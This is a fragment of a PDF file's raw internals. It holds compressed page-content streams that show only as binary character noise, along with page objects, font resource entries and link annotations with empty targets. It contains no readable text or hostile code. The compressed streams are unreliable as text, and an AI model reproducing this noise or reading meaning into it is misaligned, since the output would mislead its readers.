ÊÐ<‰ByWù2$Y7Nc}¾¼2ú›úo”öÿ‰b­¤ä,’×u”Ë+Â3¥Y½fóŒ6Ìa}D3’ÆAÄ”tº¤AàG3%q%¾U‰ÿ³KùLY&™’T½Ë9ä.áµp¾qÓ¤ˆ@Bzø¾5ÈH…óŽ‘2" ü4±eV¿›ŽÉx7¤a$c(±>–/!"¬;ÊSæ§êáŒÎIdpµ"°‚qFø¬K‚ˆ«ÀÅdDD!Í€eÉC‘¯B¬pPå <±ƒ¥wRí)5½¤Ô¶óy)X‰tºŠ’Ÿò‰-/!xͺðzæAV$¿ÆjÉü¥2qNýŒE ]È:¦­¥èT¥ˆ«RÌSº?ß_)tŠT…p2¼ÈÇCiwS†M.ã ‹šU¹ŒÒ„ KUˆ¿dœnr÷ÒŠØqR’·tÖo€†ˆ=ÁíìÄ-²‘nñø ôã:U±N‚@>ˆ£$KÛ\˜ÒlE)ßêiL}6gtV²EݸŽc;­‘°U$ÎX);ÀU$®”>ßê# GE0žæ(ª 4«MƒJžZÕ–a«÷² ò‰ +™Íš¦ïÉPÏ2kX Œ`ú=<£¼R„‹¸Ë‡<§e[h¡…`ÏVr fH¸×ë¹Ï™­u!¼›yÎË™ýƒ&q"~J¥‡Pb,ZÈÞR¹»þiûsöµ¿²¾˜ºÆblJŒý+Iy«RÆ÷Îþ 9É9ßÛÅÀ{Òý( +ÎUG‡ɘ¿^²A9ÔV„e€· å[…ç& ¤ìSB\\ª·•æržUM!Œfy)–%”ÏØ‚1™dTÕc²éÀop.(ÉP¦K’LÞ$5ÿ¼ÝZ¿oLcejV™=ËzÍìm­M ,  Ô +ò¸Ù^ÚV—ãMj¶ãmçaëª|¯nÁÑî›¶¥¦Ì:£éN¶¾ÝEõS1 ©LÅ”—#A˜Œ«»ÛÈXñºû®žTù^÷ê¹u86¼¾+á„MŽìX¿‚tVy ¿3±µ•Øh3éMsPïû»5Ó¢šq?Zp–E²¤ùëªöX‹Ö«jN9›ÏeÑ#½6Þ¯|…1|>HÔôþ×úÇ>¿¸kƒ÷y|ÔµöôRæ´RÓÕ¸¾˜H…õÏ{¢tÎr¨J²áóîñæS!+‚¡ºUµY¢dZãsšˆùg™^áw¿µm\¾È&JŠò·ãC^wFgÂþJ×õD^OoÅÒóáóדoß‘Ç߯“‹Ñ!FX Μ-ìèÉ3£±Z¬†7j©ŠÄÒo–_ÆËéÐbòIf+’¨ÐŽN‡iÒ4Íÿm‡?*“§r1:ê"s“sdõ ¾Z[Ì5ÍB’@Ëcê„å8ʼnÊö ¯§NÜ60O¡v¡}“bð©‚9«ò‚ò‰«Þõ—u¨ÿþÀò}wàz4=Üÿz“ë„òÛlüÍ¥¼^L:ÿïžÆ +endstream +endobj +843 0 obj << +/Type /Page +/Contents 844 0 R +/Resources 842 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 841 0 R +>> endobj +845 0 obj << +/D [843 0 R /XYZ 72 793.935 null] +>> endobj +842 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +854 0 obj << +/Length 2428 +/Filter /FlateDecode +>> +stream +xÚµX[oÛ¸~ϯ0 ÄÁF².”,8[¤iR¤§iÓÄÝžE7(‰±‰èVI¶ãf8¤,ÛrR؉”†3‡s¥5˜¬ÁûƒŸ6¼­=;ƒqh™vâìàû5Hàû‡e²0,%U6`~ïtp{ðåàíä`táØƒÐ }ÇLˆ‡k†®7˜$ƒïCÏ<2‚ ¿ÖÑ”ÝM>Œ.l¯CϼÀ´0”ÔcI, xûƒh}†´s]Óv]˜Œ…´&ã ¯Ê +ŸG†çxÃ?ñņüI4È 83ÃÀ'úï³ÙI–xΑ¿ütqd?«iœò(ù”fó’ÞÍŒÓ ‰ Žî£Z}È¢v–ñ¼¡y½ªžiÁ¶ºsIpRŪ˜Ó`åÀK­kÔߊgÅBñþúÀõǽêœ/¢ôð‚þ÷(¿û7Dñ' æñ‹r´.Y¿.AY/h +ÅdÅk}?ˆ\Ô3žü’Ðo§7ÀçÓå§÷wíÆxv¯í¡™EÍÆ&Ù0YåQ&b#ù#ýJÅ}U+-=å5QFyBß®xÕeZˆFËH£f #€íro(r…jó(‹Ž°"M4Ô:Zð„ù–å!× #­¡5*Ò"OÏ{m­<å OZýÏ‘:ª]G”>bá˜c7 ¼~Ž|¢yÚà„ ¯V·_>Òw‰ïoÒ4 -Ï †ËšH«y^ET“LÇéÈ´Ç®i¹¶öþÛ¿o'çW=Ø\ÛtÇž&;&Ž3’„¾ÏŠ~\㤨›iÅ[ C ˆ^)q1ÊJ,@ÁST’Ík`·‹Øqlsì·ˆKS÷é“9¾iû PÛ5}G+©°^²™Ñô›È;ŠƒÒìpð,¾ÏŸ Ž2×^¢E\uñÐí¼=Œ‡H*úäX–¥Ÿ¤Ð¶Ê ÷œ’ëBN°ƒWœp\ÎxÅ#Åþj9ºáú¶tï UÑvèX]— mYM¤~\×Å4‚]Ð ƒC!ªâ¾H’‘¡gâ°w«ŽåÃô>O¾}¾ù/yÏíùÍ_—ghâç={À,¼va‹®. ;½ sšk—~ü|vú±+±Oš?6Ãq¨—˜¤Dæzfè¡ÁÇ*Ù]¢ª˜LMï’ì®®Å=Fü„Ù@þª¤.D¢~Ô?Ó,*i¼ÒT™#uÙçÉÿü6ÒŸ ^Ç=è=fúpØŠ´(!½¢ E¢äÕCQeô%R2»¥Fà™ Ê ÅgkœñXnÆw‰y]Ò'éÑê§òue}»Ñê6¬ GàZÏ\3°Z‡Xˆ%,t:)â°÷ =í©My³.¶ùÛ0lM".²LZÊXÎDŒÇ4é ù%Nç gó`·QV`žÒ?ˆ.¼ªÕ/ulTéUSUòݼ?|—ŒESE¥•l`ò¸ '™¹ø9WJ³Áâ=Æ6•öåY{¥ ¯nm˰lo[‚k1\iÃYR*z£V÷Æ%1Wœâ$Ƨùä(€ð(Cb.¿1Øe’Ge‰õÝ +$ ’8ž×²ÄE\ &é3ÆßuÁIç¼#¦ÿ¸˜æìºgÏü©\ÒøÕÆ÷ð²6µ|6“¡ª¢:Þeì²Á +apΞŶ +^ X¥E®¢'âñ¼,åm8“oí®4›cŒ¬U²‡‡0¨)“"æf[6ubÕùS”•’·íËD‰ï>Ç÷YÍ+÷è$×w)ºÁeþË—¸`îX˜@¼õOÀAK®‘,Š\{øH_¬§tll"Z¯‡tCm‚DÙçï :—Ð~&™ìI$ÞzoZ ”ÀpU8N6nß{»{r0"tYglú–*¦'@媙銳=ÉÐo–ªœ4TñÛ¬iʓѣ½í›X%ÐÚN0¢\1ÊjŒ„¨G€ò‡Èâ‘üÇþªÚl—ɳMf;›u½aµQ. +cA+l55²úÁ(#LC8Í µŽDþsÂðô—XÚV|”mÕ雩h`(Á²#«†Â4ÍÞöfÉï•JÀ\¨F‡ˆRò +ƒî)ˆŸÐDƤ¥jdñõWD©ˆ1ÉPõLÍA<Ë‹´˜®ËÓÛklçXu!`ì@¬ì¿\^ÞÒÀ7­ãvIŸÜû(~4¸îgÞ½½º=! ’ÆùE í®½¶úÚßP³ñº â Ý6¼îh«º!dR ÝhÕóº¢Fw2Ê,£*ÊÖ=Æ‘öõ\=]ýÝEõ(?ßP?°­kÞ66÷×°u$T_ñ]uʪ¡ßµ>½ÓWH‚œû€SÙ–ý +ñŒÇ;pŸÊq–@Çž¦úö’[¢åXÌ“yÅ»»€*~‰óɱ¾¥i>ʲûAm‰÷vÄ£Ïì"ðÖ^!4†Æf}pÛ÷UÄ_•ºbpµÑ¬Ò"JZ3›R£¹% ÐS±..òœÇ öØí­ÀªÔ-~ÏU2}Ïæó¦×gôÆnÀ&*º¦aÃÉÙµ23’«®ÀÔEDUdJ@çV¬sÑ3“ Øú¦ µÂ³(ž‰\b¡¢®dÙÑwÎó'úEo6ÞIa···Œ¬[—d;л!ŠáuŠ:W<úâ.o–œo^ç@¸)y,„6ÑöžÉ÷<×ëÕ„«4ñVhÚ n5ñQ@"Ê7ãçæFQ»gôP¨ØõY[?Ÿ «Õjë^}¥tUJZ’TPªëF]R`=ášöÝ Ì[Fl¸Îù|}é×ã··Wz`lXw¯H- ¿xo@gGEjׂ¯¶/­ïy͵yëÕ­ +µþÖ7|Æ=šZ_yÆúrOŸ·»Þ‚£º]®Ã¥X`¦Å¹Væ®{ ˆ—õ7xµ\v"o-´5=@Û6øP[FMÙï>o0 +Ùp$í!¼&$º[!ñ“"<Ïñ†µHúƒtNÓr9$CŽÁ¡fˆuÕöÄ“¸õ½sD»‡¡ûK ¿–P„>ÏP¯¾%?]Biëëä"5Pd.÷€ðÔš3n0Zô™²šÿ}¾yy#¾âq Ç’rã~Õ¬ °epVÌó*æüe~ººü+ª&lÍŸçSÝ\äþ£¬X¨i0{V@ \é*+ªr†f­ôýaž•£³6Ô·øO“D4b¡Üö‚ód&;²vZ³óÉÁÿïà<˜ +endstream +endobj +853 0 obj << +/Type /Page +/Contents 854 0 R +/Resources 852 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 841 0 R +/Annots [ 846 0 R 847 0 R 848 0 R 849 0 R 850 0 R 851 0 R ] +>> endobj +846 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [455.773 571.423 494.59 582.504] +/Subtype/Link/A<> +>> endobj +847 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [74.877 557.518 119.754 569.47] +/Subtype/Link/A<> +>> endobj +848 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [155.656 557.518 313.609 569.47] +/Subtype/Link/A<> +>> endobj +849 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [443.487 557.518 485.321 569.47] +/Subtype/Link/A<> +>> endobj +850 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [71.004 543.889 117.098 555.841] +/Subtype/Link/A<> +>> endobj +851 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [122.299 543.889 167.176 555.841] +/Subtype/Link/A<> +>> endobj +855 0 obj << +/D [853 0 R /XYZ 72 793.935 null] +>> endobj +852 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R /F22 409 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +858 0 obj << +/Length 1436 +/Filter /FlateDecode +>> +stream +xÚ½XëoÚ:ÿÎ_‘oЫ‘æÅ#HÛctck¡·ÐõV]5¹‰«Iœ: ”ÿ~DZ­»®ÓtÓJñã¼ç;XÆÊ°Œ‡† o˰žcô|Ë´}ßâÆÍ­e„°þÙ°LÏïÛ’*6¼nÞ‘1oüÓx¿hŸ8¶á›~×鋥ᚾÛ1¡qÓê˜Gí¾ïµ.3´ÂG·‹ÏÇ'v§Fïuú¦åÀ’º×å$ Kš²»Fh»§m{®kڮ˦çù‚çÆ¿=jwœNkJ“ö0J׈O½Ö8 hˆÂÚ¶^¸’Ŷj<—i +d/óØ’çœF»˜²tMŽìV Öþ]ˆÁ0 IN6XÌN0ïPp(½Üúfu¬/Qå0´õ*©²tËRÊqRĘ©ü2!\°˜œ‘G(ÿà‘ûzñe°~Iü;­ÎõzǃŽÒ|3™ž@gr0ŒrB1#ò2ºb8Ë„J“?b#¤ >Ðâjé?£…Æ)—÷’¢g”üÇ_¯¤H#ŠB’¬¤h´ãs1Ér(™r9kÍÑàøj2ý0»š/pœçq?ì¶™‰Aê#nêl%óŽb°E PçRÍC£TŒ•a–Öj†²@î¢Dn(Š$ãZ%ÎPg €ä?u +äÈ’< +,QfR‰5’+Jþ–(+îp¥„å`ëŠ:­ùõ|1>û["±;žÞþ2ÇÑCÆŠ$©ãîÖ}=a(æHl)»+n•Mq·ˆ$¸Ê)³% +äJDyTwoR$‡<ÖYù—j4® +“KÆ5‰¤Äm%Y ÑòZ1 E–3ŒÍtÍy`ET½ÃÌ2É Ý Œ°ªbìžcÚ]ðÐtlèÉÏëõ-m)(ÑõöYuBRÕs¶ +ô\ûO¢÷l]2Ó¿®9NÂÊÁRÔ¾Ó÷¼¾å:2—w9ΞíùJx€´©\”Õ;–-áHq¢J«X8&v÷–r»ý®ŽœØçÄýc÷;usÏôû]aN|hEç§]ÝõôÈälW£úΠP.³5edY½Â²œ‹¬Žäaš+œg»,ÇqSS€PÁZ—ˆ9#JzH–KÌdÿ\ÄÁ:!ÎÞ¨Ò ¢bߺïIÎÛ$J­ð7œ ä!ª@e~D2i]Êc8äáÓi-è=Näm‰Ð]Ä83Uï¦TU¨ðYNµ£@]è †3"?ƒÄ@ çzF ÏÒ'P@\è*!¼ÿÒf¦ ~“Ä•”ï9÷ )ÏéáìB"YšëlÍŠZLryPào*;k©£á?­ŸÁø1‡˜ò[›*#œ¥A»‘j´õ­)Ò +èý…BDŠš¼ÿ¸xî³°šß@ŸHö~_r–”µÁ;°Ýú³Gp·*`q V¯œ/î‡ñW„Ùü¨íÚžßR¤$ éVBmNÇ !pŽÙ¦~g~_HæŒ _+oTïe›ò:.³â\^º;-‡·6­ CƫƱüÊ„Ç~W›D(YÐÎ%N¾_Î_“º ¼@8‹¤¬éB–þå¬ÿ4»˜,®¿Ù®î_Í.¾HçÆ_'£ñkT€+ªîWeÁí#¸!HÖ4>ÐZö>±â= –÷šƒà”æªvƒç]Œk¨«F¦á}ûôÖ·ºGÇ^‹ä>Œ§31ž¾G-÷t Ü¿†ƒ–~ üü^ªã•Áé†aL8 *[+ÓÅ¿F>¹œ_|çó9Ï™ñt~n½  ¥YÎ?lt'ü¤jÙ{Ô¸ûãçGm8åççôúluVnŸÎ>ΦÖ÷þxɉOˆ×Iš,ÉJÖ3iùbt.] ü@NïªÆDõu Qù ±p‹˜úôŽB¥e ÿuÌ“óê·ñ5k[û6k;=Ó‚?ûà—õ/?“²Úï +endstream +endobj +857 0 obj << +/Type /Page +/Contents 858 0 R +/Resources 856 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 841 0 R +>> endobj +859 0 obj << +/D [857 0 R /XYZ 72 793.935 null] +>> endobj +856 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +865 0 obj << +/Length 2357 +/Filter /FlateDecode +>> +stream +xÚX{oÛFÿߟBè +0)¾) +¸¶›¤.*Å•ö'8¬©•Èš"’²¢o3;³eÓÉõ ûàìì<~3»³öh3²GoϾœ9ÐÚ#g¹£(¶-'ŽGÉöìî³=ZÁü¯#Ûòãéh¯¨¶#?œB›nÏ~?»\žMÞ¸Î(¶âÐ GË5ñð¬Ø FËÕèά±9}ãC#6rüyùëäôèý`jÙ>0TÔQ„$g6‹¼ÃÑhCiMßó,Çó°cù~Lk²ÝŠæalº¡ë³±¸áeãù/Ó‡-A6µâù^Ô’/’Dæ²cÇhåŠçæ?Sçæ +˜óÜJT­¬qàÿp5[ÇÛxÄöQ¯ŽŒçW3¢¶í™ÌÜx6 gaŠÈ3yævU0½¾F@MÕÝ®à2T‰C^ŠÕK·+G“îÓŒŽ}2³2ç³yÐ=p®¨«rZY? ÁðtxA=wÞíßÅ +’ØÁì I®mTÀð×c–prƒd¢_‰ØC9 jJÏ뎷#ðQÊ!BíyÎ߼ʺññT~êgµPèƒb£ +žÙ‰y_jŸ> xpTª¼˜ÍÿO®ëv€ZÕ«X¦(†ú ¢Þª44wÔþ¶m5›Lœˆ…·çLhÁdÛ@g’eÍNîÿ€\ uhªŸ°þWŽ7¤úb†°‚FlùêFÞ«e–\$Ã#•ÀeOÒr+'Yñe›ã–|r˜lOó‘É»©ê™­qgYÖç¡·.«çXVë7º¬î +h¨ ¸zÂÑÏ—ó[êaªhøÑãˆ\*äª= ¼ìå=;£{Y€„Suy,ÌùA%¡}C„ö7¹ŠªÊéšJw\¥LÒ¢ÌËÍY^ÜÞX‹×Ëó£@ÜSãúš5… +÷¼[2´ïsñÐw CÏ5°+Ftÿå#üß\W裵à‚𠟲 ñÖêüA!8Õ±Œ_tT¢ÛãÌ+´L¼RO‹~)æ/NDh¾-*Hwt×SŸKç¿ ÝŸÀåýâzñ–g2Ö=ã]vEž=ÈœcOåÑj]4‘ºq=°bêN¥‚Aj…’D6*(hž/J‹5Þ² 9 ÿ*»cž”,ìÉ…l÷ê ÖR™_IÇ}Ú×’zµšÙI‘_ðÎû¦ñU©] _žˆÞtðîÜ Xþ6×qÜ4™W*šTË%y.ÁࢻŸ†l[ž¨®”:'`I“Èÿ=Kôïšj¿C%µº4s(9ùï…~ÔB‘~Ü^ãe¦-²„ý¯ø!«Œ•\‹]Þªê`ˆƒû] bñï™xÌä½è4¬^ƇBĉøoìø#?JžÓ¯—gÿâZ¥ +endstream +endobj +864 0 obj << +/Type /Page +/Contents 865 0 R +/Resources 863 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 841 0 R +/Annots [ 860 0 R 861 0 R 862 0 R ] +>> endobj +860 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [264.47 482.702 309.347 493.493] +/Subtype/Link/A<> +>> endobj +861 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [177.037 428.186 225.29 438.977] +/Subtype/Link/A<> +>> endobj +862 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [270.07 349.747 518.605 360.538] +/Subtype/Link/A<> +>> endobj +866 0 obj << +/D [864 0 R /XYZ 72 793.935 null] +>> endobj +282 0 obj << +/D [864 0 R /XYZ 72 560.033 null] +>> endobj +863 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R /F22 409 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +869 0 obj << +/Length 1321 +/Filter /FlateDecode +>> +stream +xÚ­X[s«6~÷¯à¡3uÚƒ HÜ2sÒqnMNã8µIÎtÒ3JLȜˌ|%$0`pÒ¦‰e÷ÛoW+iEzé×Áß•ŽŠ¤J¦&™¶TÛ–üxpûM‘:ÿER²-é¹ÐŠ%dXtŒ¤ùà÷Á¡3jªdÛРɹçØP—œ@ºê`O¶l4¼Î¼¼÷Íù2:Uõš>Ò-  +Xh›S(‚Å6$‹êˆéÊB BÈ€Ímn‹ý8ÞWo{²®éÃÛóËÓ=u8ŸÏ‹Ð_p1Ìø˜/0"â{ÑÐ ‚gÙ/C55 @S©CCP*…mÌ3²”¨¬j4CðÃtî<ÿQÆT9 øÄñádÎ¥>zT™¥¤bX£?H/Å1ɳ%Is.%Ty㔄¯d%ì½D(æ„'v•á’5²SøaâÇè-½×ˆxA›£×MEçTºœ–é›áûûyø„9÷ ÎqºLÙo®ð§¢+¾÷VQNÅîkìÊËýÅõrI¢WþuŸ’˜K¶þ¹—-# +ú~ÂYƸŒ'ÅOa’„C&ÒzÉ@Af¾ÀQÔÐ@BõÄ~syÔ‰¨w…ǔ߫ړ¾3¦ƒr3~¨|æ“Ãvi¢b{‹ù¤B{ä]q S-é…á{Fï +8]%I˜»9›ÎíF¨»Ok¨>ào›íð~59Õ-е + ÊeK÷ ?Wã?.¦ãcqA‰œÅ›îbtGçXaçþ² ·a_rèÃéé#w± ¯¯Á»hg€©R¾ÝÚ}ŽfÝ+ÝÝòÎÚëÌŒ¨Ë^;Ô鼨}ÔŒ^Ÿ]ùOâÊ=y©µ9û×Ë6mþCJVe—ÿ¹]Õñ!ö=;0éÎ`‹[lŽÍÙy°“Ñ<÷ÒœQQÅôÂK‚ˆ¶£;MqúÄ;V4Ì8 Øi0Ã>¦-d°½ º5¤µï‡‹ÉÙx~¶Ï*@E—Ÿ)>¦óý¯¼8k„¨²è¢5E= ¤/×ÎmN B—=«ÿ(νÒû~gWµ‰? Äú¡áØ÷éL¼Ìpâ Ùn=ÊÚÿ‰ûªýOnÜ8ˆCö ³<õr’6òy:6²y8žqäZB{²…[¹E<·Uú·²©WÙ¤lZ m‡9^Ñ×n’‡¾—3êåÖØJ!ß”µmƒ¶B/ã`wIޝ³“KçühìP—'ÇÍÍø_QH’°çRYeÕc~|<9¿üAœ[ /űúçF9ž8ƒÞ¿dt +endstream +endobj +868 0 obj << +/Type /Page +/Contents 869 0 R +/Resources 867 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 841 0 R +>> endobj +870 0 obj << +/D [868 0 R /XYZ 72 793.935 null] +>> endobj +867 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +875 0 obj << +/Length 1701 +/Filter /FlateDecode +>> +stream +xÚ½X[sÓ8~ϯðÎ6–¯qfvg +-P–RhÂ2Lav[M<ø,%¡ûë÷IvÇ¥-3»}¨u9÷ó#)ޱ4ãÕèûˆÀ×1ˆ¹F;6‰c#)F×_#…õ7†cûñÄØIªÂðà |sc6ú0z>={é#¶ãÐ ù’áÙ±óÔ¸6{lMbßüÈé’¿Îß<{I‚½LlÇ’:Š‘dähÓ@vhL€6ô‘Öò=Ï&ž‡Û÷cÅsýÛ×±¸yÅ–¬d5Y9&æR-ŠSƒ5½Í+šÚ¶*@¼E\ðËë ù¸Fª¬”ìþC¹^ÔŒ +–*ž/Äówgo¯Š¤HmöƒÝË\•%KD«ST=Óg¬Þf k©E]åŠô‚–Öú> — A³²U@Õ*ïŠ-”$5YÑ2Í!†ìA~÷å–lw à^!yÅ[FI;Žøý¾wkVöùïÓ9´îD¼‰ô¹¯XQm™û±þöùOYÎö¶?m3Vîá}’$ŒóFl™)-IäÚ$´]ÀÁÒ#SÏõ]µ÷ÉýÓ;=û õŸ¤À‹ ¨½ªþ©öyMK^dâ F³R°º`i5¤#)ö`¼©jelµeµÅ³#%¸ûÅ —„jqq 2ˆÉa‘ü5W,aÙ¶©ÙÆÑ½—¾"C÷ÔèíÅë“Ùë)wµòn®V +gÓOY™V;¾/Z´D{á:ާFôØ¡Tù{š|S–¹öéœÖ®Ã?ÿƒׇèjÒçËË˃h>?¹R’;½#Z¬[_Åö¸g6Ñ Úh‚5÷ôdu]Š,¡M/—Ã!T~«5Ê•wUÆ}¥yòqþúìÝüüÅÉTžv¥–Úúù²¬ê5û¾a\èÒª«bȧºŸ ÑŽæÐêÓÛ¦`õ™ZWK„8€ÍþÐùKMç@»ìêÐ8"2ñ¼Nï8n}i ºÕºÆÿM ç<«tH4*8“¿P øî´!É4 ¢;‚õÇQ¤ïdêÇNÔ5Èõíx*ƒNàʰmOiÂ`¥ü~ø'IbÛ'®)²s°–€¥žÔÙZ¢½’‹ó ÜQò!ñ–¥I,ý|VoqˆE‚H…1ÔDT²uáØ•?«&PR‹ÕuMGªà7Љý€Û]&0!¼X€Ö¿k–Ó[aI …ßqMç…°7ÉÞeb¥ÍéTa7ªÅ!X´ß¼¶š±¹<ÿŒõ8û<›Ÿ]¼Uëˆ)dŠ⼬´°^°B$']ÂkŽ‹©(,ÙÔb`»mK³CWgöù&—¯ýÎÆg½Ôïÿ«W#ãÞÖóbæÄ–ãø¯q½—?¿ç]åRBK5h&'2Ž8èç{Àâ¬B[u`a¸S{Tª·ñqƽЃf?iRÎ×PÕë|‡îcÀDµ¥õB¹Ú@Ãz(hU‚Q%†$,ÝÔL­áµ¿UÊjƒ!ÞYð W*ºÈ3¾RSZ42q¡ÂZs«°ªˆ ¢Êw|sþRü^Aœ`7›gž™Œ=‚C}÷œÁ£p4bÒl&TqÈ´Ù2Ò:¼×)d»‘©)^àš«Š«ö³Àv‚^|”¥p<«ÌBƒãε¸/ +ÜáÔ ½¶ÇV{{¼À¦<Í'z ’^ªí=ŠPW¥UáÝÀÌðÕ(Ÿ†{;`°ÝäøËÏ·sDè‡V‰Xbœhô)aÐý3Ö¨¾³z¥§åmí–…çy + ðÕ¿A15“H\é _±> endobj +871 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [110.09 119.744 154.966 130.811] +/Subtype/Link/A<> +>> endobj +872 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [71.004 79.134 119.256 89.925] +/Subtype/Link/A<> +>> endobj +876 0 obj << +/D [874 0 R /XYZ 72 793.935 null] +>> endobj +286 0 obj << +/D [874 0 R /XYZ 72 197.352 null] +>> endobj +873 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R /F22 409 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +882 0 obj << +/Length 1908 +/Filter /FlateDecode +>> +stream +xÚµXÝoÛF÷_Á‡"Ý…¿-¸‰kÔ®)m×(VäJÚ†ä2Ë•½Üß~3ûA‰¶DµÁõEÜåÎÎüæ{(ßY:¾óŸ‹/<}'p.Cçrâ{ÁdâdåÅã“ïäðþƒã{ñdìlUéÄéž…3½øéâÝìbtÎÄ›¤aêÌšGäM¢Ä™åÎã ñ†îx>5dI‡O³£Û 9 “±çÇÀPQ}$¹ð 4Ç5Çnyq<ÑD÷\Ò¡Á@®ˆ´+ÖèÕ‚¹†À¾¬¸¡ƒ}0X×õÐ /\Hšë÷ó!ìw†æKQ’Z¯ÅºªXµÔ^éç/¬Êù0¶†}]¹à¢Ä]¼9ÍȺ±0ŒtA F›.³;*Iã¢Ú ²D^޵žuÁ™|Õh£…áÑBXF©5ZÙ,²‚±m{é$±dÛËô +äF‘6MÓÀ ‚‡›a’ +ÈlRPMªi’Å=…ØMADî±wyy©Í´/’p ©–X±/k䕱p”ƒÚ¬Pæ‡«Ì…Õ +ͲF_*Ll`¨Š¥‰Ù%Šî-º0Ò©2ËyúÓF0hTýî§°Ê$S€É5%·bˆÔ‡wÍ®‘´Ôëź(ô*ƒ«@)/ºáú¨’*ï¸Ó„­ÒŒ¨u„ES°ÜX8׆úÜ£!\¸ùZo nÏ(<¨ª¯ ©C®½©í¦¨Z¹/E,VQX//­m/µÉ‰$sÒÐ*Ù×*Œqj…o¾’².¬ÐÊF™çÚ‘BrOÚp¾c™à _`XŽ#ã@\P±F¡Öö¡ï'¸Šñ °aÕû$#þ~Ö´þ‘ìƒÔ‹¢ÐŠ•D,©¼êhwê øSg œÒ9¹a{P òÞ‹ŒöÿºI˜ ê\¡î¸n¥ª-^½Óoܵ~®¤¬¯F£à2ôUa„@<éZ4*XŒkF€ñwVI4õ–ÿ;Àûñà· Š• &^„à†,i ®ËwÎFâFßÌÖ…êáÖ=ûÿŽÐò["è¨ÄÂTÊÎvÃ=mÇFÍGÏóžZï£ØØ”:×,I],#:áP4T…UÅ ¾Ü]iŠ·ÓïþföZï”ÿAª|óþýT/RÏÝ^é5ºÎIöÙ¥ŠèûwwÓ+-ó ¨ðD•Z@Pa@á-Ž1eøv´\­®Êò* ž4éãûû[ þÑl%mt*)/KA ¨{B•|Ñ@㞣OlPÔD0µñ +زüÕ1å,ˆôÌo\œ¶¼Ðôlªž…÷mØ–¼5–[|Ò¯ª¿YìCUgZÿ÷º*6¹¯5õï‚ÖÅV@Ã|CÄœUG!6’ «m-8tˆµØK]QR»XÞ Å|½XX¥9È]h”­~ñ›ŸøwSâú~ ëàXüŸ±È BE- —÷¦±TaŒØ#Ù`©Ûº­|hê6P6̆±W0›ªŒÚ›°ýü TB|lhnr6èã1þûxtmtÌ@@|ÊF‰?ð©&™mÓFS´±ÖX ÁV†¿4ôÃ.¦mÀßBV¡ƒ·\A¹.$s!5—E³¢E^ã9=Ç:S¼a.©(N6ûô•»ÚðÉMÞí¸é9[RISÍÌ«oŽjjËÞGŠ1Fõ­Ùõƒñãµ–»÷‹ q5G(Öií ¡sŽ7ò°(ÄfŒWv ÙŠUtŸo9]°ÍÉt û1ÎÄ®[²h°Ø ÜÉIÜè.ôä%ôׇu>œUª +|¬yQ¹¥´êˆ†š]ÓŒ-˜­Km^§I%G½K¼c–v€[KüÀ ªnê*ŠÆxé#õ  t£m¨¾eŽùîL¸Z{Ià`å<#ÆN$Ïmš7&»ìlÄ8=aÞ2Šûž[­Ë¹-êGòÓæ™WUJh0•ýsbk²+8ɵà“)—œN¹øYÊÝaï­…íÀqo.DÏraе£7F~¾¿þ×uÔ¤UÆó¶Òý?ê̽!¼©Lá½j¾-ê µ µ?Ã4“Ùyâ+ͳ6 oí3†ñ3«ô3üTCéghÆ–á†3c­O³ÛñHÂø»=q'1w®¡bü+Ö—¾‡>arù×?ž—k›øÜRPw¾“¦š´·¯ùº’ЫóÌ.m¬ÁÈØø]-í7Ãm…e3*ùÆ4ãhã^¶ƒ>ðbWrQ¯´¥ãÁ‡uY®ÛÊÙ‚›çL²Ñé–Ò|ßuúMÚøª\å×ÓØÚ<ôî(ÏŸ×'^(„9ô(‘t”Øs?ÛýZ‘.>U IŒ3E}'MzÙ×3^ißxeû«Ú¹~‰MC‹„OSÏ¥Šö ý«ý÷ïÔ‡‰ðb„ËxY¶mºh‡ÀÀ—¢Xì°Ù»×¶N2éyGƒðŸ6ž +ÚÚÉÍÅ+ÚO?Ë™äÏæˆ’çkK&¥Þ3YÑ3YSIôߣxYì‡* @¹¢ý62–×í4Ôÿ^\©nyôÏ”›ÙÅÿæœú= +endstream +endobj +881 0 obj << +/Type /Page +/Contents 882 0 R +/Resources 880 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 877 0 R +/Annots [ 878 0 R 879 0 R ] +>> endobj +878 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [271.582 715.148 521.44 725.939] +/Subtype/Link/A<> +>> endobj +879 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [145.207 701.519 443.101 712.31] +/Subtype/Link/A<> +>> endobj +883 0 obj << +/D [881 0 R /XYZ 72 793.935 null] +>> endobj +880 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F22 409 0 R /F26 499 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +886 0 obj << +/Length 979 +/Filter 